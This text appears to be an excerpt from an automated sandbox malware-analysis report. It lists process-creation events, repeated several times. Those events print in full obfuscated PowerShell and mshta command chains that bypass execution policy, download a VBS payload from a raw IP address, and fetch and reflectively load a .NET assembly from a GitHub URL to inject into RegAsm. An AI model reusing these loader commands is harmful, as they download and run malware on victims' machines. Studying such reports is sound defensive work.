V2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdH